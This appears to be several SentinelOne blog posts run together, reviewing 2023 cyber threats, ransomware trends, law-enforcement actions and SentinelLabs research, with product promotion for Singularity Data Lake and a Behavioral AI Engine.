The Best

Of all The Good things we reported on in cybersecurity this year, there can be no doubt that the most needful was a joined-up, coordinated approach to cyber led from the top, and the Biden-Harris administration’s National Cybersecurity Strategy went a long way toward that end. The strategy is a comprehensive approach to defend critical infrastructure, disrupt threat actors, promote data privacy and security, invest in cyber resilience, and establish international partnerships to combat cyber threats.

It’s a response to the increase in cyber attacks on various sectors in the U.S. and has already led to some useful initiatives, including the Counter Ransomware Initiative. We hope and expect to see more in 2024.

We reported on plenty of criminals being brought to justice during 2023, including the arrest of core members of the prolific ransomware gang, DoppelPaymer, in a joint operation conducted by Europol, the FBI, and the Dutch police in Germany and Ukraine.

Joseph James O’Connor was another significant capture of the year. Known as PlugWalkJoe, O’Connor was sentenced to five years in prison for various cybercrimes, including his role in the 2020 Twitter Hack, in which he and his associates used SIM swaps along with social engineering tactics to gain access to Twitter’s back-end tools and transfer control of high-profile accounts to various unauthorized users.

While some accounts were hijacked by the actors themselves, O’Connor sold the access rights of several well-known accounts to third parties. O’Connor was also charged with stealing cryptocurrency, money laundering, cyberstalking, and unauthorized access to TikTok and Snapchat.

Of course, AI has been one of the big themes of 2023. Again, the government, in collaboration with tech companies like OpenAI and Anthropic, has taken a leading role. The “AI Cyber Challenge” (AIxCC), led by the Defense Advanced Research Projects Agency (DARPA), offers up to $20 million in prizes for entries that use artificial intelligence to protect critical U.S. infrastructure from cybersecurity threats.

Leveraging AI to enhance cybersecurity is, of course, the core DNA of SentinelOne. In 2023, we announced Purple AI, a game-changing generative AI dedicated to threat-hunting, analysis and response that empowers security teams to identify and respond to attacks faster and easier using natural language conversational prompts and responses.

The Worst

Picking out the worst of The Bad things that happened in cybersecurity in 2023 is a challenging task, given just how many attacks, compromises, breaches and ITW vulnerabilities we reported on this year, but among the more standout stories of concern was Winter Vivern APT’s exploitation of a zero-day vulnerability (CVE-2023-5631) in Roundcube’s webmail software, used to steal email data from European governments and think tanks.

Casinos MGM and Caesars were among some of the big name victims of the year’s record number of ransomware attacks.

All ALPHV ransomware group did to compromise MGM Resorts was hop on LinkedIn, find an employee, then call the Help Desk.

A company valued at $33,900,000,000 was defeated by a 10-minute conversation.

— vx-underground (@vxunderground) September 13, 2023

2023 saw a 95% year-on-year increase in extortion attacks as threat actors continue to leverage social engineering, weak or misconfigured cloud assets, and old vulnerabilities to lock files and steal data.

A feature of 2023 ransomware has been a new focus on compromising ESXi hypervisors through a slew of variants built out of the leaked Babuk (Babyk) code. A wave of ESXiArgs ESXi targeted attacks was reported early in the year, encrypting extensive amounts of data across servers in the US, Canada, and Central Europe.

A report by SentinelLabs in May detailed how numerous threat actors were hopping on the easy availability of source code for Linux ransomware to target vulnerable EXSi servers.

The Ugliest

What have 3CX, JumpCloud and macOS users involved with cryptocurrency got in common? You guessed it: North Korea. From supply chain attacks to espionage and financially-motivated cybercrime, DPRK-aligned threat actors have been keeping us busy and many victims awake at night throughout 2023.

The SmoothOperator campaign disclosed in early 2023 was a supply chain attack targeting both macOS and Windows users, exfiltrating victim data over https using a custom data encoding algorithm. The macOS version of the trojanized 3CX application was delivered via a maliciously crafted version of libffmpeg.dylib contained within the application bundle’s Electron Framework folder.

../3CX Desktop App.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Libraries/libffmpeg.dylib

Although the full extent of the attack remains unclear, reports at the time suggested that over 240,000 IP addresses were using the trojanized 3CX Phone System Management Console.

Breaches of government networks are always among the ugliest of the Ugly, and several concerning attacks were recorded throughout 2023. In December, a high-severity vulnerability, tracked as CVE-2023-26360, found in Adobe’s ColdFusion was used to gain initial access into U.S. government servers.

CISA highlighted two incidents in which CVE-2023-26360 was used to compromise federal agency systems. Both instances involved outdated server software vulnerable to various CVEs, with threat actors leveraging the vulnerability to deploy malware through HTTP POST commands to the ColdFusion-associated directory path. It seems the government still has plenty of work to do to implement its own cybersecurity best practices.

Finally, it’s been a tough year across OSes in terms of in-the-wild exploitation of vulnerabilities, but it appears to have been a record year for Apple’s increasingly troubled iOS platform, with 19 zero days reported as being abused by threat actors in 2023. The phrase “Apple is aware of a report that this issue may have been exploited…” may have never been more oft-seen by Apple users than this year.

Google HQ, aka “GooglePlex”, sits 7 miles from Apple Campus and staff there also appear to have had their hands full patching security bugs throughout 2023. Among the more severe bugs patched this year were:

• CVE-2023-2033 (CVSS score: 8.8) – Type Confusion in V8
• CVE-2023-2136 (CVSS score: 9.6) – Integer overflow in the Skia graphics library
• CVE-2023-3079 (CVSS score: 8.8) – Type Confusion in V8
• CVE-2023-4863 (CVSS score: 8.8) – Heap buffer overflow in WebP
• CVE-2023-5217 (CVSS score: 8.8) – Heap buffer overflow in vp8 encoding in libvpx

However, the WebP vulnerability likely had the largest impact on users, as the flawed library is used across Apple, Google, Microsoft, Mozilla and other non-browser products. The bug in the widely used image encoding and compression library was first reported by Citizen Lab to Apple as part of an in-the-wild attack.

Microsoft, meanwhile, has continued to patch up its regularly exploited backlog of vulnerabilities, while at times ignoring newly-discovered security issues. In June, the company said that a bypass found by researchers that can allow malware to be delivered to any Teams account from external accounts did not ‘meet the bar for immediate servicing’. The response came as a surprise as researchers showed that all MS Teams accounts running in the default configuration were susceptible to their PoC attack.

In an attempt to cut through the scarcity of candor these days, let’s state some things plainly. Let’s talk about Microsoft. With the upfront caveat that every security vendor has made mistakes and has skeletons in their respective closets that need addressing. None without sin.

— J. A. Guerrero-Saade (@juanandres_gs) July 23, 2023

The way Microsoft corporate has been acting for the past few years (SolarWinds, Hafnium, general JCDC collaboration, and now Storm-0588) is enraging, duplicitous, disappointing, counterproductive, and most importantly unnecessary.

— J. A. Guerrero-Saade (@juanandres_gs) July 23, 2023

Conclusion

So much for the highlights and low spots of 2023: You can find more on all these stories as well as all the others we reported on this year right here.

Our regular weekly roundups will return next Friday; in the meantime, let us wish you a happy and secure New Year 2024 from all of us here at SentinelOne!

Meanwhile, despite new government initiatives and international cooperation to combat cybercrime, ransomware continues to be a top challenge for enterprises, in an environment where cloud assets represent new targets and LLMs offer both defenders and attackers new tools and new opportunities. Throughout the year, SentinelLabs has been tracking, identifying and disclosing information on these and other issues to help organizations and defenders stay ahead of the threats to their business operations.

All our research and threat intelligence posts can be found on the SentinelLabs home page, but for a quick recap of the year’s main cybersecurity events, take a scroll through the 2023 timeline below.

January

In January, we reported on pro-Russia hacktivist group NoName057(16), describing its attacks on Ukraine and NATO organizations as well as its targeting of the 2023 Czech presidential election. We identified a volunteer-fueled DDoS progam operating over public Telegram channels and described in detail their DDosia malware. We also revealed how the group, previously reported on for tageting both the Polish government and the Danish financial sector, abused GitHub to host its toolkit and offered payments to its most impactful contributors.

In January 2023, we also reported on DragonSpark, a cluster of opportunistic attacks against organizations in East Asia. The threat actors used Golang malware that implemented an uncommon technique to hinder static analysis and evade detection: Golang source code interpretation.

February

SentinelLabs observed the first ELF variant of Clop ransomware and reported on its flawed encryption method, allowing us to develop and publish a decryptor for the malware.

In February, we also exposed a cluster of virtualized .NET malware loaders being distributed through malvertising attacks. Dubbed MalVirt, the loaders were seen distributing the Formbook family of malware and disguising C2 traffic by beaconing to random decoy servers hosted on providers such as Azure and Namecheap.

In other research published this month, SentinelLabs in collaboration with QGroup GmbH identified a new threat cluster tracked as WIP26 engaging in targeted espionage activities against telecommunications businesses. WIP26 also relies heavily on public cloud infrastructure to disguise malicious traffic, abusing Microsoft 365 Mail and Google Firebase services for C2 purposes.

March

Telcos were also the targets of Operation Tainted Love, this time in the Middle East. Believed to be an operation conducted by Chinese cyberespionage actors, we disclosed how the campaign was an evolution of Operation Soft Cell. The initial attack phase involved infiltrating Internet-facing Microsoft Exchange servers to deploy webshells for command execution. Once a foothold had been established, the attackers deployed custom credential theft malware.

Also in March we reported on the evolution of AlienFox, a comprehensive, modular toolset for credentials harvesting against multiple cloud service providers.

April

Transparent Tribe (aka APT36) is a suspected Pakistan-based threat group active since at least 2013. In April, SentinelLabs observed this long-running threat actor expand its interest into the Indian education sector through a cluster of malicious documents staging Crimson RAT. Previously focused on Indian military and government personnel, the threat actor was observed distributing malicious education-themed content hosted on known APT36 infrastructure. The malicious documents stage Crimson RAT using Microsoft Office macros or OLE embedding.

In addition, some Crimson RAT variants were identified using a cracked versions of a commercial tool Eazfuscator to obfuscate code. This represents a change in tactics from earlier versions which relied on the Crypto Obfuscator tool for such functionality.

May

The leak of Babuk source code back in 2021 has led to multiple ransomware variants and contributed to a widely expanded crimeware ecosystem. In May 2023, SentinelLabs revealed how this same source code was behind 10 different ransomware families targeting VMware ESXi, potentially enabling new threat actors who might otherwise lack the technical skills to target Linux systems. Due to the prevalence of ESXi in on-prem and hybrid enterprise networks, these hypervisors are valuable targets for ransomware.

In May, the SentinelLabs team also disclosed Operation Magalenha, a long running campaign by a Brazilian threat actor targeting Portuguese financial institutions for credentials and PII theft.

June

Across May and June, SentinelLabs released reports on DPRK-aligned threat actor Kimsuky. In collaboration with NK News, we disclosed a targeted social engineering campaign against experts in North Korean affairs from the NGO sector. The campaign focused on theft of email credentials, delivery of reconnaissance malware, and theft of NK News subscription credentials.

A hallmark of the activity was establishing initial contact and developing a rapport with their targets prior via impersonation of industry figures before initiating malicious activities, a tactic also seen in DPRK-aligned cybercrime activity aimed at cryptocurrency exchanges.

If the target engages in the conversation, Kimsuky uses the opportunity to deliver a spoofed URL to a Google document, which redirects to a malicious website specifically crafted to capture Google credentials. Kimsuky has also been seen delivering weaponized Office documents that execute the ReconShark malware.

July

Cloud security came to the fore in July through both crimeware and APT intrusions. We reported on a cloud credentials stealing campaign that had expanded from targeting AWS cloud instances to include both Azure and Google Cloud. Primarily seeking out exposed Docker instances, crimeware actors looked to deploy a worm-like propagation module via script-based and UPX-packed Golang-based ELF binaries.

Elsewhere, an intrusion at cloud-based IT management service company JumpCloud turned out to have infrastructure connections DPRK-aligned threat activity, SentinelLabs reported. The intrusion bore links to the earlier 3CX SmoothOperator campaign we reported on in March.

August

North Korean-aligned threat actors were having a busy year throughout 2023, but not all their targets were in the west. In August, we identified intrusions into the Russian missile engineering organization NPO Mashinostroyeniya, a sanctioned entity that possesses highly confidential intellectual property on sensitive missile technology currently in use or under development for the Russian military.

Our investigation uncovered an email trove leaked from the victim organization that revealed two separate sets of activity. We were able to establish a connection between each cluster of activity and reveal that a more significant network intrusion had occurred that the victim organization realized.

Chinese adversaries also came to our attention this month after we identified malware and infrastructure directed at the Southeast Asia gambling sector. We observed indicators that pointed to China-alinged BRONZE STARLIGHT group: a suspected Chinese ‘ransomware’ group whose main goal appears to be espionage rather than financial gain, using ransomware as means for distraction or misattribution. However, exact attribution remains unclear due to the complex interconnections between various Chinese APT groups.

September

Transparent Tribe came to our attention for a second time in 2023 via distribution of its CapraRAT malware in a novel YouTube-like Android application we dubbed CapraTube. We identified three Android application packages mimicking the appearance of YouTube but which also requested spyware-like permissions.

In September, SentinelLabs also hosted its second LABScon event, featuring talks from leaders across the cybersecurity industry. Among the keynotes were Tom Hegel’s presentation on how China uses strategic intrusions in under monitored regions such as Africa to further and to strengthen its regional goals.

SentinelLabs’ Aleksandar Milenkoski, in collaboration with QGroup, reported on yet another adversary targeting telcos. Dubbed Sandman, the previously unreported threat actor has targeted organizations across the Middle East, Western Europe and the South Asian subcontinent with a novel modular backdoor that utilized the LuaJIT platform.

October

The shocking events in Israel in October 2023 and their aftermath may yet come to define much of the headlines to come in 2024, but in terms of cyber activity there is still a lack of clarity as different hacktivist groups pursue various goals in support of one side or another.

Our initial reporting on state-sponsored activity emerging from events on the ground aimed to highlight adversaries-of-interest to the cybersecurity community at large in an effort to better coordinate reporting and help to understand the threat model facing organizations.

November

Continuing on from October’s activity, we reported on Arid Viper‘s SpyC23 malware and the group’s espionage campaign targeting Android devices.

This long-running campaign through 2022 and 2023 involves weaponized apps posing as the Telegram messeging app or a romance-themed messaging app called ‘Skipped Messenger’. Our report highlighted how Arid Viper had developer several newer SpyC23 versions delivered via social engineering. The spyware, once installed, gained a high degree of control over the victim’s device including being able to make calls without user interaction, capture microphone and audio input, and collect sensitive data, including the phone’s contacts list.

Of course, 2023 has also been the breakout year for AI, and threat actors have not been slow to jump on the bandwagon either. In November, we reported on Predator AI, a new Python-based infostealer and hacktool designed to target cloud services. Advertised through Telegram channels related to hacking, the main purpose of Predator is to facilitate web application attacks against various commonly used technologies, including content management systems (CMS) like WordPress, as well as cloud email services like AWS SES.

December

We rounded out the year with two reports on earlier themes. In joint research between SentinelLabs, PwC and MS Threat Intelligence, we published further intelligence on the Sandman APT we reported at September’s LABScon, noting that Sandman and STORM-0866/Red Dev 40 share infrastructure control and management practices. Importantly, we described commonalities between two distinct malware strains: the LuaDream malware and the KEYPLUG backdoor.

In our final report of the year, we turned to activity attributed to Gaza Cybergang, a long-running cluster of Hamas-aligned threat activity known since 2012. Tracking activity spanning from late 2022 until late 2023, we observed that the group introduced a new backdoor to their malware arsenal, Pierogi++, used in targeting primarily Palestinian entities.

These activities are likely aligned with the tensions between the Hamas and Fatah factions, whose reconciliation attempts had been stagnating before and after the outbreak of the Israel–Hamas war. We describe the development of Pierogi++ and highlight overlaps in targeting that suggest the Gaza Cybergang sub-groups have likely been consolidating.

Conclusion

This year as last, SentinelLabs has continued its mission to keep defenders abreast of the latest developments and trends across crimeware, APT and other cyber threat activity. Aside from the research highlighted here, there’s more to be found across our From the Front Lines series of posts and our published and forthcoming videos of talks from LABScon 2023.

You can also meet the SentinelLabs team in our quarterly threat briefings.

We’ll be back in 2024 with more security research and threat intelligence reporting. In the meantine, we wish all a happy, secure and peaceful New Year and 2024.

3,500 suspected cybercriminals of all levels found themselves nabbed this week by a major international law enforcement initiative dubbed Operation HAECHI IV. The arrests were accompanied by the confiscation of a staggering $300 million in illegal gains. The half-year long operation, spearheaded by South Korean authorities, saw collaboration with agencies from 34 nations, including major players such as the United States, the United Kingdom, Japan, and India.

Operation Haechi IV makes online world safer for all by attacking AI-driven scams and e-frauds: 3000 arrests, 82,000 suspicious accounts blocked & USD 300 million seized & networks disrupted #CyberSecurity https://t.co/tlHuam6xYx

— INTERPOL (@INTERPOL_HQ) December 19, 2023

This expansive operation unfolded between July and December 2023, with a primary focus on combating threat actors engaged in a spectrum of cybercrimes that ranged from e-commerce and investment fraud, business email compromise (BEC), voice phishing, online sextortion, and illicit online gambling. Additionally, Interpol identified and froze a substantial 82,112 bank accounts across 34 countries linked to various cybercrimes and fraudulent activities.

The operation revealed two key threat trends that continue to gain traction in the current cybercrime world. The first focuses on digital investment frauds and NFT investment platforms that operate briefly before a final “rug pull”, where the scammers abscond with all invested funds and erase all traces of their existence. The second adds to existing concerns about the use of artificial intelligence (AI) by threat actors. HAECHI found that the fraudsters leveraged AI and deepfake tools to mimic real individuals’ voices to further their impersonation scams.

Interpol has emphasized the gravity of the $300 million seizure, describing it as a clear driving force behind the rising nature of transnational organized crime. Global involvement in major operations like HAECHI continue to underscore the need for disrupting underground financial infractures that fund and support hierarchies of cyber threat actors and groups.

The Bad | Chameleon Banking Trojan Gets a Feature Upgrade Allowing Hackers to Steal Android Device PINs

Android users were put on high alert this week with news of a novel version of Chameleon banking trojan enabling hackers to steal device PINs. Security researchers reporting on the latest iteration noted that targets have spread to include users in the UK and Italy.

Analysis of the resurgence indicates that Chameleon is now distributed through an off-the-shelf Dropper-as-a-Service (DaaS) called Zombinder, allowing the trojan to masquerade as a Google Chrome web browser. Zombinder attaches malware to legitimate Android apps, tricking victims to unknowingly use the intended app while dangerous code runs in the background.

The latest Chameleon variant introduces two notable features. Firstly, it displays an HTML page on devices running Android 13 and later, prompting victims to grant permission for the app to use the Accessibility service. By detecting Android 13 or 14, the malware bypasses the “Restricted Setting” security feature, enabling it to guide users through a manual process to activate Accessibility and overcome system protections. Secondly, Chameleon disrupts biometric operations like fingerprint and face unlock, forcing a fallback to PIN or password authentication using the Accessibility service. The trojan captures entered PINs and passwords, allowing it to unlock the device at will for malicious activities concealed from the user.

These feature enhancements speak to the adaptability of the new Chameleon variant, positioning it as a more potent threat in the mobile banking landscape. To mitigate the threat, users are advised to avoid downloading Android package files (APKs) from unofficial sources, as this is the primary distribution method for the Zombinder service. Users should also ensure that Play Protect is enabled and conduct regular device scans for malware and adware.

The Ugly | Millions Impacted In Data Breach of Major Electronic Health Record Software Company

ESO Solutions informed their customers this week of a ransomware attack on their systems, which compromised the personal data of 2.7 million patients. The company is a major supplier of electronic health record (EHR) products for various healthcare organizations and fire departments across the U.S. As of this writing, no ransomware group has claimed responsibility for the ESO attack.

According to their notice, the initial attack occurred in late September and involved data exfiltration before the attackers encrypted several company systems. This tactic points to double extortion where victims are threatened in a two-pronged approach: first, the victim is threatened to decrypt their files via ransom payment, and then they face the risk of having the stolen files and data leaked or sold online. This strategy amplifies the impact of ransomware attacks, putting the victim in a very dangerous dilemma. Paying the ransom fuels the attackers to continue future threat campaigns, and refusing to pay means losing sensitive information.

In the attack on ESO, the attackers were able to access a machine containing sensitive personal data of several ESO clients, including full names, dates of birth, phone numbers, patient account/medical record numbers, injury type and date, diagnosis information, treatment type and date, procedure details, and Social Security Numbers (SSNs).

ESO Solutions has confirmed that other than notifying the FBI and state authorities, they took affected systems offline immediately and successfully restored operations through viable backups. The company also clarified that currently, no evidence has been found that the compromised data has been misused. To mitigate the short and long-term risks post-breach, ESO has offered 12 months of identity monitoring service coverage to affected individuals.

Security is a big data problem. This data, while invaluable for proactive threat mitigation, often proves to be a challenge to collect, normalize, and analyze, especially when scattered across siloed tools and systems.

Legacy data solutions lack flexibility, scalability, and are cost prohibitive, preventing organizations from achieving the required level of security management. As the cybersecurity landscape continues to evolve, a robust, scalable, and cost-effective data solution becomes a necessity.

It is reported that 60% of all SIEM and Data Lake projects fail. One of the primary reasons is the sheer complexity of ingesting and normalizing different data sources into a single place. Many organizations have to create dedicated teams of IT and Security engineers to spend days grappling with data ingestion or managing parsers. In essence, teams are spending more time configuring prerequisites than focusing on security operations.

The Future of Enterprise Security Data and Analytics

That’s where SentinelOne can help with Singularity Data Lake. This solution empowers businesses to centralize and transform data into actionable intelligence for real-time investigation and response with our AI-powered, unified Data Lake. Singularity Data Lake is a cost-effective, high-performance security and log analytics platform converging SIEM, XDR, and Log Analytics into one solution.

Ingesting third-party data is simple with Singularity Marketplace, an ecosystem of data connectors to integrate with industry-leading solution providers. Empower teams to quickly collect and normalize all types of data, with one-click installation, into the Open Cybersecurity Schema Framework (OCSF) for a broad view of security and data analytics.

By leveraging the standards-driven OCSF-ready connectors from Marketplace, Singularity Data Lake simplifies cybersecurity and IT operations by eliminating the need for teams to manage parsers and handle data normalization. This simplified data ingestion promotes cost efficiency and scalability–translating into significant cybersecurity cost savings.

Singularity Data Lake offers advanced threat detection, investigation, incident response, and contextualized threat intelligence. This empowers security professionals with the tools necessary to stay ahead of potential breaches, ensuring swift and effective blocking, removal, and mitigation of threats.

As compliance needs evolve, organizations that select Singularity Data Lake for their security and log analytics can pick from a variety of short-range retention periods, including up to 360 days. Thanks to its high-scale, cloud-native data lake architecture combined with a massively parallel query engine, Singularity Data Lake ensures data is always readily available in hot storage, for both short and long-range retention and querying.

For organizations looking to prolong data storage, teams can opt for long-range retention and long-range queries spanning one to five years. Unlike traditional solutions on the market which involve storing long-term data in slow cold storage, Singularity Data Lake’s high-performance search and availability allow for instant access at any time.

What’s more, it’s not just about data centralization. SentinelOne’s multi-tenancy and role-based access controls allow organizations to efficiently partition data and delegate responsibilities. Organizations can also gain unique insights from customizable dashboards, transforming raw data into actionable insights, tailored to specific needs.

In a nutshell, Singularity Data Lake empowers organizations to navigate the ever-evolving threat landscape confidently. By making data easier to centralize, transform, and retain, security teams can gain faster detection, advanced analysis, and enhanced investigation capabilities. Singularity Data Lake is a comprehensive security and log analytics platform that improves security outcomes and keeps organizations secure in today’s digital landscape.

AI-Powered Security Platform

Singularity Data Lake powers the Singularity Platform, the first AI security platform to provide enterprise-wide visibility and protection, bringing all enterprise data together in a unified data lake to reduce risk and help protect businesses. Any organization with Singularity Platform included in their subscription such as Singularity Complete, Singularity Commercial, and Singularity Enterprise customers already have access to Singularity Data Lake with up to 10GB per day of third-party data ingestion, not including native security data from SentinelOne, at no additional cost. Customers can increase this ingestion volume and add long-range retention and queries of up to five years.

Enhanced Standalone Singularity Data Lake

We often hear from organizations that the top pain points for traditional SIEM solutions are cost and performance. As data growth outpaces budgets, security and IT teams are leaving important data behind and prioritizing intake only on what they can afford. This can lead to gaps in investigation, triage, hunting, response effort, and compliance issues. When attacks happen, security teams often need to go back much further than the last 14 or 30 days.

To help organizations move away from a costly and slow traditional SIEM solution and accommodate compliance needs, Singularity Data Lake is also available as a standalone product, serving as a robust, high-performance security and log analytics solution. The same short and long-range retention and long-range query options are also available.

With our innovative Singularity Data Lake, we’re empowering security teams with SIEM and XDR capabilities beyond their existing legacy SIEM solutions. The standalone offering of Singularity Data Lake provides the following capabilities:

• Centralize all data into a unified data lake for streamlined analysis.
• Search effortlessly across all ingested data to find crucial insights quickly.
• Access the Singularity Marketplace seamlessly, equipped with dozens of OCSF-ready data connectors that ensure automatic normalization of security data.
• Manage access to multiple organizations with multi-tenancy and Role-Based Access Control (RBAC) capabilities to efficiently partition data and responsibilities.
• Customize dashboards for better visualization, transforming ingested data into actionable insights.
• Utilize PowerQuery to craft precise detections that enhance cybersecurity posture.

Learn More

To learn how to transform security and log analytics, meet our team for a demo. For existing SentinelOne customers, please contact your SentinelOne account team to discuss how to further leverage the Singularity Data Lake.

Emerging Pressure Tactics In Ransomware Schemes

In the latest ransomware and extortion operations, financially motivated actors are leveraging new ways to pressure their victims into complying to their demands. Groups like ALPHV, for example, are now openly threatening to report victims to the SEC for violation of public disclosure for breaches they themselves committed. We have also observed groups like Rhysida threatening to expose illicit and incriminating data that was discovered upon exfiltration of the victim data.

Recent developments in legal frameworks, including the SEC’s updated rules for cybersecurity incident reporting, GDPR, and existing data protection laws, are being manipulated to increase pressure on organizations that are already at risk. Cybercriminals are using these regulations to heighten victims’ fears of legal repercussions and damage to their reputation, thereby forcing them into paying ransoms.

This trend highlights the urgency for organizations to bolster their cybersecurity measures, adhere to regulatory standards, and stay prepared for the ever-changing landscape of cyber threats. With cybercriminals constantly seeking innovative methods to exploit businesses, it is important for cyberdefense teams to maintain vigilance and adaptability in their approaches to counter these advancing threats.

A previous blog post we published discusses the increasing “leveling up” of pressure tactics coupled with troubling victimology, painting a potentially problematic picture of how attacks are likely to play out in the near future. Companies dealing with this multi-pronged extortion onslaught include the likes of Toyota, Delta Dental, Fred Hutch Cancer Center, Kraft Foods, Idaho National Lab and more. There is more potential damage being done now in the big-game ransomware operation attacks and the frequency of these attacks deserves much consideration.

Multi-looting is amongst the tactics leveraged by these modern more extensive options—one example of this emerging behavior developed between ALPHV and medical product manufacturer, Henry Schein. According to reports, this victim experienced multiple encryptions during recovery and negotiation.

On Again, Off Again | Fluctuations In Ransomware Groups

As of this writing, the FBI has officially confirmed their seizure of the primary BlackCat/ALPHV infrastructure. The TOR sites have been seized and victims are now able to obtain decryption tools from the FBI via an IC3 filing. Victims of BlackCat ransomware are strongly encouraged to contact their FBI field office for further information and to determine next steps and options for assistance.

This is a sizeable victory indeed, as per the FBI’s notice: “Blackcat actors have compromised computer networks in the United States and worldwide. The disruptions caused by the ransomware variant have affected U.S. critical infrastructure – including government facilities, emergency services, defense industrial base companies, critical manufacturing, and healthcare and public health facilities – as well as other corporations, government entities, and schools. The loss amount globally is in the hundreds of millions and includes ransom payments, destruction and theft of proprietary data, and costs associated with incident response.”

Within a similar timeframe, NoEscape also appeared to have closed up shop whilst holding onto millions of dollars in funds due to their affiliates. This is known as an exit scam, and the primary operators of NoEscape appear to have ceased communicating with both their partners and affiliates. There are a number of arbitration complaints against the operators on various major crimeware forums. These same forums and dark markets appear to have banned the operators from further activity in those forums.

Adding to the already foggy situation, LockBit ransomware operations are reportedly attempting to recruit affiliates directly from the potential pool of those that have been “done wrong” by NoEscape and ALPHV operations.

A Year End Rise In Identity-Focused Attacks

Identity compromise, and the subsequent use of valid credentials to perform illegitimate activities, is nearly ubiquitous in the modern landscape of cyberattacks. IAM platforms play a crucial role in both enhancing security and improving user experience by streamlining access processes within an organization. They are particularly important in large and medium-sized businesses where managing a large number of user identities and permissions is a complex task.

The compromise of market-leading IAM platforms continues to blossom and expand as we head towards the end of 2023. When we discuss the compromises of enterprises like 1Password, LastPass, BeyondTrust, and other identity management providers, the thing to keep in mind is the long-term and downstream effects. Outside of the immediate problem of compromised credentials and accounts, victims also face the ongoing issues associated with associated legal issues that may arise, damaged reputation, and associated loss of revenue. Also to consider is that, once compromised, it is trivial for the attacker to leverage the platform to start intercepting the data and traffic belonging to platform users. In this scenario, a single compromise of an IAM extends to many victim environments.

The consequences of a security breach in an IAM platform are far-reaching and can impact an organization on multiple fronts, including financial, legal, operational, and reputational aspects. It underscores the critical importance of robust security measures and constant vigilance in managing these systems. The downstream effects of breaches within the likes of 1Password, LastPass, and similar will be felt going into 2024 and beyond.

Forum and Dark Market Updates

We previously discussed ongoing cyber activity occurring on Telegram in our September cybercrime update. In the context of low-sophistication cybercrime marketing and sales, Telegram has collected a reputation for being a “Wild Wild West-like” hub for criminal activities. Accounts, proxy access, mail/identity lists and data, VPS services, FUD crypting, bank logs, and SIM/cell carrier services (aka SIM-swapping) are all available with essentially zero barrier to entry. Cybercrime actors of all types continue to congregate within relevant Telegram channels.

Given the approaching holiday season, we are seeing many channels and bots providing pseudo-sales and promotions on malware kits, tools, and other illicit services.

On the subject of forums, the Clearnet forum launched by Cyber Drag0nz in September appears to now be down or defunct. In a broader trend, it seems that many of the smaller Middle-Eastern crimeware operations, which have been amplified with the onset of the Israel-Hamas war, are showing their true size and abilities.

New Initiatives and Counter-Operations

In the final month of 2023, the information security community has seen more law enforcement activities such as crackdowns and arrests in parallel with some new and positive developments from the recent Counter Ransomware Initiative (CRI) Summit.

At the tail end of November, a large-scale option out of Europol led to the arrests of numerous ransomware affiliate actors associated with LockerGoga, MegaCortex, Hive, and Dharma. This action follows the initial wave of arrests that occurred in 2021. The recent action was focused across regions in Ukraine. Considered a large victory for global law enforcement agencies, these takedowns go some considerable distance in chipping away at the infrastructure of known threat actor infrastructure.

Notably, we also saw the arrest of an alleged ringleader of the Kelvin Security hacking group this past month in Spain. The detainee was a primary figure in an associated money laundering activity which focused on cryptocurrency exchanges. This is an especially satisfying victory for law enforcement given the scope of the involved victimology. According to the released statements, the group has operated since 2013 and has carried out more than 300 high-level cyberattacks in the last three years, targeting strategic industries in over 90 countries, including the U.S., Germany, Italy, Argentina, Chile, and Japan.

Along those lines, an individual known as FFX pleaded guilty to charges surrounding their involvement in the development of Trickbot malware. Specifically, the Russian national was known for their contributions to the malware’s browser injection components, along with mechanisms for deployment and management of additional code (e.g., ransomware payloads). The developer currently faces a maximum sentence of 35 years in prison for charges related to computer fraud, identity theft, wire, and bank fraud.

Recent developments from the highest levels of government are set to shape upcoming cybersecurity initiatives in the new year. At the latest Counter Ransomware Initiative Summit, members from across the world focused on global collaboration in ongoing cybersecurity strategies. Representatives from 50 countries discussed new methods to combat ransomware threats. Key topics included strengthening international cooperation, tackling financial underpinnings of ransomware, and enhancing public-private partnerships. The summit highlighted the evolving role of AI in cybersecurity and emphasized the importance of information sharing and policy initiatives to disrupt ransomware financing. These efforts aim to build a more resilient global cybersecurity infrastructure against the growing threat of ransomware.

Conclusion

After examining the past month, several compelling trends continue to demand our attention. High-profile threat operators, momentarily vanishing only to resurface later, have rendered the ransomware landscape more dynamic than ever. Ongoing attacks on leading IAM platforms signal to security leaders the very real vulnerabilities linked to the identity surface. Cybercriminals are shifting towards new methods in pressuring their victims to pay exuberant ransoms.

In the wake of these challenges, new cyber initiatives and counter-operations spearheaded by international federal governments are in place to address and push innovation in incident response, threat intel sharing, and other preventative measures.

In the face of these emerging trends, employing a comprehensive security solution like SentinelOne’s Singularity XDR, which leverages AI and automated remediation, can serve as a potent weapon in an organization’s cybersecurity arsenal. It’s more crucial than ever to stay ahead of the curve, adopting proactive measures that help detect and mitigate threats before they can inflict significant damage.

To learn more about how SentinelOne can help defend your organization’s endpoint, cloud, and network assets, contact us or request a free demo.

Our real-time CWPP solution uses five detection engines, each working to complement the other, to detect runtime threats impacting cloud workloads.

• Static AI Engine
• Cloud Intelligence Engine
• App Control Engine
• Behavioral AI Engine
• STAR Rules Engine

Behavioral AI Engine 101

SentinelOne’s Behavioral AI Engine detects and mitigates previously unknown threats by monitoring kernel process actions and memory usage. This form of AI is not bypassed by malicious countermeasures, and readily identifies sophisticated threats including:

• Fileless attacks
• Ransomware, including polymorphic ransomware
• Zero-day exploits
• Credential theft
• Privilege escalation
• Malicious scripts
• MITRE tactics and techniques
• And more.

The Behavioral AI Engine has several characteristics:

• Autonomous operation: It functions fully with or without an internet connection to the SaaS management console. The intelligence of the engine is built within the agent itself such that there is no round-trip latency to the cloud for analysis.
• Real-time: The agent monitors all kernel-level processes as they are launched.
• Post-execution: Unlike the Static AI Engine, which examines files before they are executed, the Behavioral AI Engine is constantly observing all processes as they execute.
• Storyline: Our patented visualization technology that tracks what’s happening inside of each cloud workload.

What is Storyline?

To truly appreciate the inner workings of the Behavioral AI Engine, one must understand the role of SentinelOne’s Storyline technology. Storyline accelerates attack responses, reduces atomic alert noise, and surfaces actionable context for security analysts. Here is how it works.

SentinelOne’s CWPP supports 14 (and counting) Linux distributions and 20 years of Windows Servers. Storyline observes all concurrent kernel processes, malicious and benign. It automatically “connects the dots” (i.e., identifies relationships) between related processes and preserves context such as process metadata. The AI monitors each thread against probabilistic thresholds of normalcy which, when crossed, trigger instantaneous protection against machine-speed attacks.

